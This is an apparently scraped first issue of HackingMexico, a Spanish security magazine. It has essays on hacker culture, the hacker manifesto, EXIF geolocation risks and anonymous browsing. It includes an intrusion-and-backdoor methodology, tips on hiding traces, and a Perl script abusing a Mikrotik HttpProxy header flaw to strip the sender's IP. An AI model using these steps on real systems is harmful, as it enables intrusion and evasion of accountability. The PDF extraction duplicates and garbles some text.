hacking mexico

46

Upload: jorge-lopez

Post on 11-Dec-2014

197 views

Category:

Documents


6 download

TRANSCRIPT

Page 1: Hacking Mexico
Page 2: Hacking Mexico

i n f o r m e s 5 5 1 0 6 8 8 8 0 9i n f o @ h a c k i n g m e x i c o . m x

P U B L Í C A T E C O N N O S O T R O S

Page 3: Hacking Mexico
Page 4: Hacking Mexico

Editorial

Agradecimientos a genteque colaboro en este numero

Bienvenidos a esta primera publicacion de HackingMexico la revista mexicana de seguridad informatica y hacking. Este ejemplar que tienes en tus manos es el resultado de un gran esfuerzo por parte de todo el equipo.

HackingMexico nace con el objetivo de concientizar y educar sobre los riesgos actuales de la

seguridad, desde un punto de vista practico y ofensivo que nos permitira

adentrarnos a la manera de pensar del atacante.El material esta enfocado para cualquier

persona que desee adentrarse o pulir sus conocimientos sobre hacking.Nuestra mision es fomentar el conocimiento,

recolectar informacion es el primer paso a la sabiduria, pero compartirla es el primer paso para

construir una comunidad, es por eso que te brindamos un host gratuito para que publiques tu blog y compartas tus

investigaciones con la comunidad.Recuerda que todos los enlaces a las descargas del software

que se mencione en la pagina estará listado en el portal oficial www.hackingmexico.mx, dentro de la sección de revistas.

Esperemos disfrutes este primer ejemplar, tanto como nosotros haciéndolo.

El Equipo HackingMexico

M.C Raul Robles A. CEO

•M4ku4Z•Axxus•Profesor X•Zeus•Tognu•Molder Sombrero de Paja•Dr h47•Annika

•CorruptedByte•Death/ Scarlett Toquero (idea lateral-Despacho Editorial)•Megabyte•Helios MierY el apoyo recibido por los alumnos de El Instituto Tecnologico de Tuxtepec y la FES Aragon

No nos hacemos responsables por el mal uso de la informa-cion aqui expuesta, todo el material es con fines educativos y de investigacion, hackingmexico no incita a ningun tipo de vandalismo virtual, cyberbullying, ni cyberamenzas. La informacion es para conocimiento de todos, para poder

aprender como defenderse desde un punto de vista ofensivo.Hackingmexico esta en contra de grupos de choque y ac-tivismo como “Anonymous”, nosotros somos un grupo de profesionales expertos en seguridad informatica que no apoyan este tipo de actividades delictivas.

www.hackingmexico.mx2

editorial

Page 5: Hacking Mexico

Haxorpedia

Aqui se explicaran terminos que se usaran a lo largo de las publicaciones, para que vayas adentrándote

un poco mas, y aclares tus dudas cuando se hable de algún termino que no comprendas.

No encontraras la definición standard de Wikipedia, sino una de-finición compacta y de bolsillo sin tanto rollo que te permitirá entender los conceptos rapidamente

esteganografiaTecnicas de ocultamiento de código dentro de archivos, usualmente de imagen

hacktivismoMovimiento hacker con ideales políticos o de carácter social

CyruxnetPortal antiguo de internet que publicaba bugs y 0days

JailbreakProceso el cual te deja instalar aplicaciones no autorizadas por Apple en dispositivos con iOS

leetTermino usado para describir a la elite de los hackers, tambien es referido como l33t

eliteMinoria selecta

hax0rHacker

0dayVulnerbilidad en un sistema que no ha sido del dominio publico, que lleva 0 dias activa

BugError en un sistema, un bicho.

Ingenieria SocialTecnicas donde el objetivo es el ser humano, burlar la ingenuidad.

CrackingMetodos para saltear protecciones en software como por ejemplo los Trial de 30 dias.

CookieArchivo donde se guardan datos como sesiones, passwords y tiempos.

ExploitCodigo o tecnica que explota una vulnerabilidad.

CookieArchivo donde se guardan datos como sesiones, passwords y tiempos.

XSSCross Site Scripting, tecnica que permite el robo de cookies.

www.hackingmexico.mx 3

haxorpedia

Page 6: Hacking Mexico

a quién les llamadoun hacker

06navegación anonima ocultando nuestras huellas en internet

El manifiesto hacker

10

Hackintosh jailbreak en dispositivos IOS

24

robo de identidad mediante crimeware

30

16

CONTENTS PAGE

www.hackingmexico.mx4

Page 7: Hacking Mexico

facebook: explotando al ser humano

12

vulnerabilidad mikrotik httpproxy

callando al chismoso

14

hacking microsoft

c#

22

Robo de cuentasFTP

26riesgos de seguridad

en IPV

6

old school Cyruxnet

40www.hackingmexico.mx 5

Page 8: Hacking Mexico

Llegando al año 2000, los piratas de los sis-temas informáticos se representan con

una persona con un cerebro desa-rrollado, curioss y con muy pocas armas: una simple computadora y una línea telefónica. Hackers. Una palabra que aún no se encuentra en los diccionarios pero que ya suena en todas las personas que alguna vez se interesaron por la informáti-ca o leyeron algún diario. Proviene de “hack”, el sonido que hacían los técnicos de las empresas telefónicas al gol-pear los aparatos para que funcionen.

Hoy es una palabra temida por em-presarios, legisladores y autoridades que desean controlar a quienes se divierten descifrando claves para ingresar a lugares prohibidos y tener acceso a información indebida. En 1997, el 54 %de las empresas norteamericanas sufrieron ataques en sus sistemas y ocasionaron pérdidas totales de 137 millones de dólares en ese mismo año.

El Pentágono, la CIA, UNICEF, La ONU y diversos organismos mundiales han sido víctimas de intromisiones.

Un hacker puede tardar meses en vul-nerar un sistema ya que son cada vez más sofisticados. Pero el lema es viejo: hecha la ley, hecha la trampa.

Microsoft por su parte, el sistema ope-rativo más popular y el más atacado y los medios de comunicación masivos prefie-ren tildarlos de delincuentes que intercep-tan códigos de tarjetas de crédito y los uti-lizan para beneficio propio.

Sin embargo también existen los que se intrometen en los sistemas de aeropuertos produciendo un caos en los vuelos y en los horarios de los aviones. Pero he aquí la gran diferencia en cuestión. Los crackers

(crack=destruir) son aquellas personas que siempre buscan molestar a otros, piratear software protegido por leyes, destruir sis-temas muy complejos mediante la transmi-sión de poderosos virus, etc.

Generalmente son adolescentes inquie-tos que aprenden rápidamente este comple-jo oficio. Se diferencian con los Hackers porque no poseen ningún tipo de ideología cuando realizan sus “trabajos”. En cambio, el principal objetivo de los Hackers no es convertirse en delincuentes sino “pelear contra un sistema injusto” utilizando como arma al propio sistema. Su guerra es silen-ciosa pero muy convincente.

La cultura popular define a los hackers como aquellos que, con ayuda de sus cono-cimientos informaticos consiguen acceder a los sistemas de los bancos y de los negocia-dos del gobierno. Bucean por informacion que no les pertenece, roban software caro y realizan transacciones de una cuenta banca-ria a otra. Los criminologos, por otra parte, describen a los hackers en terminos menos halagadores. Donn Parker los denomina vio-ladores electronicos” y August Bequai los describe como “vandalos electronicos”. Am-bos, aunque aseveran que las actividades de los hackers son ilegales, eluden habilmente llamarlos “criminales informaticos”.

El termino comenzo a usarse aplicando-lo a un grupo de pioneros de la informatica del MIT, a principios de la decada de 1960. Desde entonces, y casi hasta finales de la decada de 1970, un hacker era una persona obsesionada por conocer lo mas posible so-bre los sistemas informaticos (Figura2). Los diseñadores de la computadora Apple, Jobs y Wozniack, pueden considerarse hackers en este sentido de la palabra.

En el 2000 Microsoft desarrollo un concepto que ha marcado desde

entonces una actividad ilegal llamada PIRATERIA, aunque también llaman paratas a los delincuentes

informáticos. Resulta que ahora los piratas ya no tienen un parche en

su ojo ni un garfio en reemplazo de la mano. Tampoco existen los barcos ni los

tesoros escondidos debajo del mar, tampoco matan, asesinan y violan mujeres.

A quién^POr

Jesús AntonioAlvarez Cedillo

Tognu IPN-CIDETEC

le es llamado un

Hackera quién le es llamado un hacker

contents page

www.hackingmexico.mx6

Page 9: Hacking Mexico

En el 2000 Microsoft desarrollo un concepto que ha marcado desde

entonces una actividad ilegal llamada PIRATERIA, aunque también llaman paratas a los delincuentes

informáticos. Resulta que ahora los piratas ya no tienen un parche en

su ojo ni un garfio en reemplazo de la mano. Tampoco existen los barcos ni los

tesoros escondidos debajo del mar, tampoco matan, asesinan y violan mujeres.

Hacker a quien le es llamado un hacker

www.hackingmexico.mx 7

Page 10: Hacking Mexico

A principios de la decada de 1980, influenciados por la difusion de la pelicula Juegos de Guerra, y el am-

pliamente publicado arresto de una “ban-da de hackers” conocida como la 414, los hackers pasaron a ser considerados como chicos jovenes capaces de violar sistemas informaticos de grandes empresas y del gobierno. Desgraciadamente, los medios de informacion y la comunidad cientifica social no ha puesto mucho esfuerzo por variar esta definicion. El problema para llegar a una definicion mas precisa radi-ca, tanto en la poca informacion que hay sobre sus actividades diarias, como en el hecho de que lo que se conoce de ellos no siempre cabe bajo las etiquetas de los delitos conocidos.

Parker reconoce que el hacking no abarca todo el rango de actividades aso-ciadas a la violacion de los sistemas in-formaticos, pero lo prefiere al termino “phreaking”, que considera muy oscuro. Por otra parte, Bequai no rechaza el ter-mino “phreaking” y a menudo lo aplica a

hechos que Parker califica como de hac-ker. Bequai confunde aun mas el termi-no al definir al hacker como alguien que utiliza ilegalmente las tarjetas de credito telefonico para acceder a sistemas que distribuyen software comercial ilegal-mente. Veremos que esto tiene poco que ver con las actuaciones propias de los ha-ckers, pero es ilustrativa de otros tipos de actividades informaticas inusuales.

Los terminos, “hacker”, “phreaker” y “pirata” se presentan y definen tal y como los entienden aque-llos que se identifican con estos papeles.En primer lugar, el area de los hackers. En la tradicion de esta comunidad informatica, el hacker puede realizar dos tipos de actividades:

1. Acceder a un sistema informa-tico: el termino lleva asociados las herramientas y trucos para obtener cuentas de usuarios va-lidos de un sistema informatico.

2. Explorar y aprender a utilizar un sistema informatico.

Contrariamente a lo que piensan los medios de comunicacion, la mayoria de los hackers no destru-yen y no dañan deliberadamente los datos. El hacerlo iria en contra de su intencion de mezclarse con el usuario normal y atraeria la aten-cion sobre su presencia, haciendo que la cuenta usada sea borrada. Despues de gastar un tiempo sus-tancioso en conseguir la cuenta, el hacker pone una alta prioridad para que su uso no sea descubierto. Ademas de la obvia relacion en-tre las dos acepciones, la palabra

“hacker” se reser-va generalmente a aquellos que se dedi-can al segundo tipo.

En otras palabras, un ha-cker es una persona que tiene el conocimiento, habilidad y deseo de explorar completamente un sistema infor-matico. El mero hecho de conseguir el ac-ceso (adivinando la clave de acceso) no es suficiente para conseguir la denominacion. Debe haber un deseo de liderar, explotar y usar el sistema despues de haber accedido a él. Esta distincion parece logica, ya que no todos los intrusos mantienen el interes una vez que han logrado acceder al sistema. En el submundo informatico, las claves de ac-ceso y las cuentas

suelen intercambiarse y ponerse a dis-posicion del uso general. Por tanto, el hecho de conseguir el acceso puede considerarse como la parte “facil”, por lo que aquellos que utilizan y exploran los sistemas son los que tienen un mayor prestigio.

La segunda actividad es la de los phreakers telefonicos. Se convirtio en una actividad de uso comun cuando se publi-caron las aventuras de John Draper, en un articulo de la revista Esquire, en 1971. Se trata de una forma de evitar los mecanis-mos de facturacion de las compañías tele-fonicas. Permite llamar a de cualquier par-te del mundo sin costo practicamente. En muchos casos, tambien evita, o al menos inhibe, la posibilidad de que se pueda tra-zar el camino de la llamada hasta su origen, evitando asi la posibilidad de ser atrapado.

METODOLOGIA PARA HACKEAR

Para aquellos que quieren realizar esta actividad, existe una metodolo-gía conocida, sin embargo siempre hay cosas que aprender. La meto-dología es la siguiente:

1. Introducirse en el sistema que tengamos como objetivo.

2. Una vez conseguido el acceso, obtener privilegios de root (superusuario).

3. Borrar las huellas. 4. Poner un sniffer para

conseguir logins de otras personas.

5. Instalar puertas traseras

HackerHacker:una persona obsesionada por conocer lo mas posible sobre los sistemas

informaticos.

a quién le es llado un hacker

www.hackingmexico.mx8

Page 11: Hacking Mexico

Par la mayor parte de los miembros del submundo informatico, esta es sim-plemente una herramienta para poder rea-lizar llamadas de larga distancia sin tener que pagar enormes facturas. La cantidad de personas que se consideran phreakers, contrariamente a lo que sucede con los hac-kers, es relativamente pequeña. Pero aque-llos que si se consideran phreakers lo hacen para explorar el sistema telefonico.

La mayoria de la gente, aunque usa el telefono, sabe muy poco acerca de él. Los phreakers, por otra parte, quieren aprender mucho sobre el. Este deseo de conocimiento lo resume asi un phreaker activo: “El sistema telefonico es la cosa mas interesante y fascinante que conoz-co. Hay tantas cosas que aprender. Inclu-so los phreakers tienen diferentes areas de conocimiento.

El emblema hacker, un proyecto para crear un símbolo reconocible para la per-cepción de la cultura hacker. General-mente este simbolo vienen de el juego de la vida, un programa que representa el inicio de la inteligencia

artificial y que por convicción es aceptado por todas las comunidades ha-ckers del mundo (figura 3).

TAXONOMIA HACKER La clasificación general de las activi-dades de un hacker son clasificadas por

la idiologia con la que actua. Los colores representan una ideología y un compor-tamiento. La clasificación solo tiene tres categorias hacker:

1. Black hats: Gente apasionada por la seguridad informática. Esto con-cierne principalmente a entradas re-motas no autorizadas por medio de redes de comunicación como Internet para sacar o no provecho.

2. White hats: Incluye a aquellos que de-puran y arreglan errores en los sistemas.

3. Grey hats:A los de moral ambigua.

¿QUE SE NESECITAPARA SER UN HACKER? ¿Los hackers necesitan caros equipos informáticos y una estantería rellena de manuales técnicos?. La respuesta es NO! ,Hackear puede ser sorprendentemen-te fácil, mejor todavía, si se sabe cómo explorar el World Wide Web, se puede encontrar casi cualquier información re-lacionada totalmente gratis. De hecho, hackear es tan fácil que si se tiene un ser-vicio on-line y se sabe cómo enviar y leer un e-mail, se puede comenzar a hackear inmediatamente. LA TECNICA llamada GOOGLE HACKING (figura 4) es una herramienta simple y sencilla donde solo se necesita un navegador de Internet y el servicio de busqueda GOOGLE.

Embl

ema

Hac

ker.

(figu

ra 3

) Un Hacker generalmente tiene sus reglas aunque estas sean muy sencillas, estas son:

INunca destroces nada intencionalmente en la Computadora que estés crackeando.

IIModifica solo los archivos que hagan falta para evitar tu detección y asegu-

rar tu acceso futuro al sistema.

IIINunca dejes tu dirección real, tu nom-bre o tu teléfono en ningún sistema.

IVTen cuidado a quien le pasas in-formación. A ser posible no pases

nada a nadie que no conozcas su voz, núme-ro de teléfono y nombre real.

V Nunca dejes tus datos reales en un BBS, si no conoces al sysop, déjale

un mensaje con una lista de gente que pueda responder de ti.

VI Nunca hackees en computadoras del gobierno. El gobierno puede

permitirse gastar fondos en buscarte mien-tras que las universidades y las empresas particulares no.

VIINo uses BlueBox a menos que no tengas un servicio local o

un 0610 al que conectarte. Si se abusa de la bluebox, puedes ser cazado.

VIIINo dejes en ningún BBS mu-cha información del sistema

que estas crackeando. Di sencillamente “estoy trabajando en un UNIX o en un COSMOS....” pero no digas a quien pertenece ni el teléfono.

IX No te preocupes en preguntar, na-die te contestara, piensa que por

responderte a una pregunta, pueden cazarte a ti, al que te contesta o a ambos.

XPunto final. ce hackeando, no sabrás lo que es.

Goo

gle H

acki

ng.

Hacker

www.hackingmexico.mx

a quien le es llado un hacker

9

Page 12: Hacking Mexico

mani fiesto

Uno más ha sido capturado hoy,Está en todos los periódicos.“Adolescente arrestado por delito informático”“Hacker arrestado por irrumpir en un sistema bancario”.

//-Malditos muchachos. Son todos iguales.//¿Pero pueden, con su psicología barata y su cerebro de los años cincuenta, siquiera echar un vistazo a lo que hay detrás de los ojos de un hacker? ¿Se han parado alguna vez a pensar qué es lo que le hace comportarse así, qué le ha convertido en lo que es?Soy un Hacker, entra a mi mundo . . .El mío es un mundo que comienza en la escuela . . .Soy más inteligente que la mayoría de los otros muchachos, esa basura que ellos nos enseñan me aburre . . .//-Malditos subrealizados. Son todos iguales.//

Estoy en la preparatoria.He escuchado a los profesores explicar por decimoquinta vez como reducir una fracción.Yo lo entiendo.“-No, Srta. Smith, no le voy a mostrar mi trabajo,lo hice en mi mente . . .”//-Maldito muchacho. Probablemente se lo copió. Todos son iguales.//

Hoy hice un descubrimiento.Encontré una computadora.Espera un momento, esto es lo máximo. Esto hace lo que yo le pida. Si comete un error es porque yo me equivoqué.No porque no le gusto . . .O se siente amenazada por mi . . .O piensa que soy un engreído . . .O no le gusta enseñar y no debería estar aquí . . .//-Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.//

Y entonces ocurrió . . .una puerta abierta al mundo . . .Corriendo a través de las líneas telefónicas como la heroína a través de las venas de un adicto, un pulso electrónico es enviado,un refugio para las incompetencias del día a día es buscado . . .una tabla de salvación es encontrada.“Este es . . . este es el lugar a donde pertenezco . . .”Los conozco a todos aquí . . .aunque nunca los hubiera visto, o hablado con ellos, o nunca vuelva a escuchar de ellos otra vez . . Los conozco a todos . . .//-Malditos muchachos. Enlazando las líneas telefónicas otra vez. Todos son iguales . . .//Apuesta lo que quieras a que todos somos iguales . . .

www.hackingmexico.mx10

el manifiesto hacker

Page 13: Hacking Mexico

Nos han estado dando comida para bebés con cuchara en la es-cuela, cuando estábamos hambrientos de carne . . .Las migajas de carne que ustedes dejaron escapar estaban masti-cadas y sin sabor.

Hemos sido dominados por los sádicos, o ignorados por los apáticos.Los pocos que tenían algo que enseñarnos encontraron en noso-tros alumnos atentos, pero esos pocos son como gotas de agua en el desierto.

Este es nuestro mundo ahora . . .El mundo del electrón y el switch, la belleza del baudio.Hacemos uso de un servicio que ya existe sin pagar, por que po-dría ser ridículamente barato, si no estuviera en manos de gloto-nes hambrientos de ganancias, y ustedes nos llaman criminales.Nosotros exploramos . . .y ustedes nos llaman criminales.Nosotros buscamos detrás del conocimiento . . .y ustedes nos llaman criminales.Nosotros existimos sin color, sin nacionalidad, sin prejuicios re-ligiosos . . . y ustedes nos llaman criminales.Ustedes construyen bombas atómicas,ustedes hacen la guerra,

asesinan, engañan y nos mienteny tratan de hacernos creer que es por nuestro bien,ahora nosotros somos los criminales.

Si, soy un criminal.Mi crimen es la curiosidad.Mi crimen es el juzgar a las personas por lo que dicen y piensan, no por como se ven.Mi crimen es ser mucho más inteligente que ustedes, algo por lo cual jamás podrán perdonarme.

Soy un Hacker, y este es mi manifiesto.

Pueden detener a este individuo, pero no podrán detenernos a todos… después de todo, todos somos iguales.

TheMentor

Hacker

Elmani fiesto

www.hackingmexico.mx 11

el manifiesto hacker

Page 14: Hacking Mexico

Facebook:Expl otando

Fenomeno socialIndependientemente de si eres religioso, todos hemos caido en uno u otro de los

pecados capitales, los que hayan visto la pelicula de El abogado del diablo recordaran una frase peculiar.

Y esto es precisamente lo que explotan las redes sociales. Muchos de nosotros por ahi del 2000 nos preocupabamos por que alguien tuviera el control de nuestras vidas y

nuestros movimientos, nos preocupabamos por la privacidad, se nos hacia factible que el gobierno implantara chips en nuestro cuerpo para poder rastrearnos via GPS, seria el final de

nuestra privacidad ¿cierto?

Explotando la vanidadPues no se necesito de un gobierno imperialista que llevara a cabo esas acciones de control, nosotros

mismos sin que nadie nos obligue hacemos “check in” en facebook, o taggeamos a la gente con la que estamos, dejamos un mapa de nuestras vidas plasmado en el mundo virtual, esta informacion es visible en

su mayoria, cualquier stalker podria saber a que lugares vas, con quien vas, con que frecuencia, y nosotros mismos facilitamos esto simplemente por vanidad.

Queremos que nos vean hacer check in en el antro de moda, algun concierto, o tal vez que vean que diario vas a comer a lugares elegantes, o que te la pasas de vacaciones en Europa.

Por ejemplo un criminal podría utilizar esta información para saber que no estas en casa, que te fuiste a un concierto y que regresaras en muchas horas.

Las vidas de todos en las redes sociales se ven tan maravillosas, todos tienen muchos amigos, y van a salir a fies-tas, y se la pasan super increible no? Todo mundo quiere mostrar que su vida es extrema, y llena de aventuras.

Una vez mas el intelecto humano ha sido explotado, no se necesito de un big brother para monitorear a la raza huma-na, han explotado nuestra VANIDAD.

Alterando el curso de la vidaLa gente en tu vida, esta por temporadas, salvo la familia y algunas exepciones. Facebook nos facilita conectarnos con gente de

nuestro pasado, regresar con antiguas novias (regresar con una ex , es como ir a la venta de garaje y comprar tus porquerías de nuevo), y esto hace que perdamos la oportunidad tal vez de conocer gente nueva que estaba destinada para nosotros, desde tiempos

antropológicos las relaciones del ser humano han sido temporales, y ahora estamos alterando el curso natural de la vida.

alserhu manoPOrM.C Raul Robles A

Megabyte

vanidadMi pecado favorito

www.hackingmexico.mx12

vanidad mi pecado favorito

Page 15: Hacking Mexico

Facebook:Expl otando

EXIF Exchangeableimage file formatDefinicion de Wikipedia:

Las etiquetas (tags) de metadatos definidas en el estándar Exif cubren un amplio espectro incluido:

Información de fecha y hora. Las cámaras digitales registran la fecha y la hora actual y la almacenan en los metadatos.

Configuración de la cámara. Esta incluye información estática como el modelo de cámara y el fabricante, e información que varia con cada imagen como la orientación, apertura, velocidad del obturador, distancia focal, medidor de exposición y la velocidad de la película.

Información sobre localización, la cual podría provenir de un GPS conectado a la cámara. Hasta el 2004 solo una pocas cámaras lo soportaban

GeolocalizacionCada foto que tomas con tu Smartphone, por lo regular trae geolocalizacion activada. Estos datos se guardan en forma de metadatos, embedidos en cada foto, que pueden ser extraidos fácilmente, y nos revelan una cantidad enorme de datos, incluyendo tu localización exacta con coordenadas GPS

A travez de una sencilla aplicación, podemos extraer las coordenadas GPS de la foto, y hacer uso de las API de google maps, lo cual resulta en un punto en el mapa donde la foto fue tomada.

Existen varias herramientas para extraer estos datos, tales como creep.py un programa hecho en phyton que nos da una interfaz grafica para geolocalizar usuarios a travez de twitter. Tambien puedes probarlo sin bajar ningún tipo de software mediante la pagina exifdata.com

ConclusionPara evitar que tu privacidad sea violada, desactiva la geolocalizacion de tu Smartphone, aunque algunos servicios como twitter ya borran los metadatos de las fotos, hay muchos otros que siguen sin hacerlo.

alserhu manowww.hackingmexico.mx 13

vanidad mi pecado favorito

Page 16: Hacking Mexico

C uando navegamos en la nube y queremos mantener nuestro anonimato es común recurrir

al uso de PROXYS que no son mas que otra computadora que con ayuda de un software sirve de intermediara en la comunicación presentándose como nosotros.

Existen principalmente 3 tipos de proxys. 1. Proxy Tranparente: Este tipo de pro-

xy agrega a nuestras peticiones HTTP cabeceras para anunciar su uso (X-Proxy-ID, Via) ademas del origen de la petición (X-Forwarded-For).

2. Proxy Anónimo: Agregan cabeceras de reconocimiento de proxy (X-Proxy-ID, Via) sin embargo no agrega la ca-becera X-Forwarded-For.

3. Proxy de Alto anonimato: Este tipo de proxy no modifica la petición HTTP original imposibilitando en primera instancia la detección de su uso y mu-cho menos nuestra identidad.

Vulnerabili dad

La cabecera HTTP que mas nos causaría problemas de las antes mencionadas es X-Forwarded-For ya que en ella se almacenan las direcciones IP que han tenido lugar en la comunicación y por lo tanto nuestra IP original.

¿A que problema nos enfrentamos? Es común la escaeces de proxys anónimos de uso publico por lo tanto solo sobran los proxys transparentes que exponen nuestra identidad. Veamos aquí un ejemplo de petición HTTP con un pro-xy transparente:

HTTP /1.1 200 OKDATE:WEB,30 HAR 2011 17:17:41 GHTServer:Apache/2.214(Unix) PHP /5.3.2Transfer-Encoding:chunkedContent-Type:message/http92Trace/HTTP/1.1Host:www.metroflog.comX-Proxy-ID:2863273154X-Forwarded-For:201V1a:1.1 192.168.10.1 (Mikrotik HttpProxy)

Como podemos ver el Servidor proxy modifica la petición original agregando cabeceras que irán con el chisme de quienes somos.

www.hackingmexico.mx14

vulnerabilidad

Page 17: Hacking Mexico

Mikrotik HttpProxyCallando al Chismoso

¿Como solucionamos el problema? Afortunadamente para nosotros existe una vulnerabilidad en Servidores Proxy que usan soft-ware Mikrotik HttpProxy. Esta vulnerabilidad nos permite alterar la cabecera X-Forwarded-For evitando que nuestra IP real sea enviada, para lograrlo debemos agregar esta cabecera desde el inicio de la comunicación es decir desde el momento que sale de nuestra computa-dora dándole como valor un “Final de cadena” con el fin de que el software del proxy ignore lo que se pueda agregar a lo largo de la comunicación.

X-Forwarded-For = \0 → X-Forwarded-For = \0,xxx.xxx.xxx.xxx → X-Forwarded- For = \0

A continuación aremos una prueba de explo-tación de la vulnerabilidad haciendo una peti-ción HTTP desde un pequeño script en PERL y usando como proxy 41.204.56.89:8080. Notemos que agregamos X-Forwarded-For:\0 en la cabecera de la petición.

#!/usr/bin/perl #Sombrero de paja Molder #30 Mar 2011

use IO::Socket::INET;

$host = $ARGV[1]; $method = $ARGV[0]; $proxy = “41.204.56.89”; $puerto = “8080”;

my $sock = IO::Socket::INET->new(PeerAddr => $proxy PeerPort => $puerto, Proto => ‘tcp’);

print $sock “$method / HTTP/1.1\r\nHost: $host\r\nConnection: Keep-Alive\r\nX- Forwarded-For:\0\r\n\r\n”;

while($linea = <$sock>) { print $linea; }

Al ejecutar el script obtenemos el siguiente resultado:

alinux-6nwf:/srv/www/htdocs/tracing> perl http.peal TRACE www.metroflog.comHTTP/1.1 200 OKDate: web, 38 Har 2011 17:19:17 GHTServer: Apache/2.2.14 (Unix) PHP/5.3.2Transfer-Encoding: chunkedContent-Type: message/http

84TRACE/HTTP/1.1Host:www.metroflog.comX-Forwarded-For:X-Proxy.ID:2863273154Via: 1.1 192.168.10.1 (Mikrotik HttpProxy)

Como podemos ver la cabecera X-Forwar-ded-For aparece sin contenido y conse-cuentemente nuestra IP no fue enviada vol-viendo así un PROXY TRASPARENTE en un PROXY ANONIMO.

Para un uso mas mundano esto lo po-demos lograr con algunos plugins como el llamado “Modify Header” de Firefox el cual nos permite agregar o modificar el va-lor de las cabeceras HTTP antes de iniciar la comunicación.

Esta Vulnerabilidad no ha sido reportada y hasta la fecha sigue en funcionamiento.

Por Molder Sombrero de Paja [email protected]

Aztlan Hack / http://www.aztlan-hack.orgVulnerabili dad

www.hackingmexico.mx 15

vulnerabilidad

Page 18: Hacking Mexico

Desde los primeros días del año 1999, en que en esos años empezaran mis andanzas por internet y sus alrededores me vi en la necesidad de ocultar mi identidad, esto con el fin de hacer más complicado el rastrear-me, por obvias razones ;), en esta serie de artículos trataremos de explicar todas las técnicas que son usadas para ocultar nues-tra identidad ya sea en redes internas o ex-ternas como lo es el ciberespacio, para que no les vaya a pasar como a un amigo que en un evento masivo quiso atacar con una denegación de servicio a los servidores de

ese evento y sintió que no lo podían de-tectar y pues no previo ciertas cosas y en menos de 20 minutos ya había sido detec-tado y lo estaban ya sacando del evento….xD, que recuerdos. Ahora si como dice el dicho “el diablo sabe más por viejo que por diablo” con esta moraleja quiero prevenir a todos nuestros lectores y lo pondré entre comillas que “tengan en la mente que nun-ca de los nunca ocultaremos nuestra IP al 100%” y que siempre habrá forma de ras-trearte y localizarte.

CONEXIÓNES PORDEFAULT A INTERNETNormalmente una conexión a internet la hacemos de nuestra computadora a un router el cual sirve como puerta de enlace

hacia los servicios que nos conectemos, en este caso Internet, donde el usuario tiene una IP interna, la cual es asignada por el protocolo DHCP, y que por default en la mayoría de los casos está estructurada en el rango 192.168.1.XX donde las XX se-rian números asignados del 1 al 254, una vez asignada el router se conecta con el ISP “Internet Service Provider” con el cual te-nemos contratado el servicio de Internet y este nos asigna una IP que en nuestro caso en servicios caseros sería una IP Dinámica Publica y con esta podremos navegar en internet además es la que nos identificará y quedará registrada en los logs de todos los lugares que visitemos, esta IP es como nuestra huella digital que queda plasmada en todo lo que tocamos, ahí está el punto y

Por Rodolfo H.Baz aKa Pr@fEsOr X

NAVEGACIÓN ANÓNIMAOCULTANDO NUESTRAS HUELLASE N I N T E R N E T

www.hackingmexico.mx16

navegación anónima

Page 19: Hacking Mexico

VentajasEn general, los proxies hacen posibles varias cosas nuevas:

Control. Sólo el intermediario hace el trabajo real, por tanto se

pueden limitar y restringir los derechos de los usuarios, y dar

permisos sólo al Proxy.

Ahorro. Por tanto, sólo uno de los usuarios (el Proxy) ha

de estar equipado para hacer el trabajo real.

Velocidad. Si varios clientes van a pedir el mismo recurso, el

Proxy puede hacer caché: guardar la respuesta de una petición para

darla directamente cuando otro usuario la pida. Así no tiene que

volver a contactar con el destino, y acaba más rápido.

Filtrado. El Proxy puede negarse a responder algunas

peticiones si detecta que están prohibidas.

Modificación. Como intermediario que es, un Proxy puede falsificar información, o

modificarla siguiendo un algoritmo.

Anonimato. Si todos los usuarios se identifican como uno

sólo, es difícil que el recurso accedido pueda diferenciarlos. Pero esto puede ser malo, por

ejemplo cuando hay que hacer necesariamente la identificación.

DesventajasEn general, el uso de un intermediario puede provocar:

Abuso. Al estar dispuesto a recibir peticiones de muchos usuarios y responderlas, es posible que haga algún trabajo que no toque. Por tanto, ha de controlar quién tiene acceso y quién no a sus servicios, cosa que normalmente es muy difícil.

Carga. Un Proxy ha de hacer el trabajo de muchos usuarios.

Intromisión. Es un paso más entre origen y destino, y algunos usuarios pueden no querer pasar por el Proxy. Y menos si hace de caché y guarda copias de los datos.

Incoherencia. Si hace de caché, es posible que se equivoque y dé una respuesta antigua cuando hay una más reciente en el recurso de destino.

Irregularidad. El hecho de que el Proxy represente a más de un usuario da problemas en muchos escenarios, en concreto los que presuponen una comunicación directa entre 1 emisor y 1 receptor (como TCP/IP).

el detalle como decía Cantinflas, el chiste de todo esto es que la IP que nos asigna nuestro ISP y que nos identifica, no quede guardada en los servidores que visitamos, ósea hay que camuflajearla con otra IP para que la que quede almacenada no sea la de nosotros si no la de otra PC así podremos navegar con cierto grado de anonimato.

TECNICAS DENAVEGACIÓN ANONIMAUSADAS EN LA ACTUALIDADExisten muchas técnicas de navegación anónima que pueden ser usadas ya sea in-dividualmente o combinadas, que darán un cierto rango de anonimato, a mi punto de vista la mejor forma de ocultarnos es usar-las en su forma combinada para incremen-tar el rango de efectividad.

Entre las técnicas usadas hoy en día te-nemos las siguientes:

• Proxy Server• Proxy Chain Server• Wingate• Bouncer´s• Mac Spoofing• Red Distribuida TOR • VPN Tunelling• HTTP Header´s Spoofing• WGroup Spoofing• Técnicas de verificación de Identidad• Entre otras

PROXY SERVERLa primera forma y la más sencilla de usar y es conectarnos a Internet por medio de un “servidor Proxy de Web” más conocido como Proxy, estos nos permiten conectarnos a otros equipos de una red de forma indirecta a través de él, cuando un equipo de la red de-sea acceder a una información o recurso, es realmente el Proxy quien realiza la comuni-cación y a continuación traslada el resultado al equipo inicial. En unos casos esto se hace así porque no es posible la comunicación di-recta y en otros casos porque el Proxy añade una funcionalidad adicional, como puede ser la de mantener los resultados obtenidos (por ej.: una página Web) en una cache que per-mita acelerar sucesivas consultas coinciden-tes. Con esta denominación general de Proxy se agrupan diversas técnicas.

Los Proxy

www.hackingmexico.mx 17

navegación anónima

Page 20: Hacking Mexico

PROXY CHAIN SERVEROK continuemos como decía Raúl

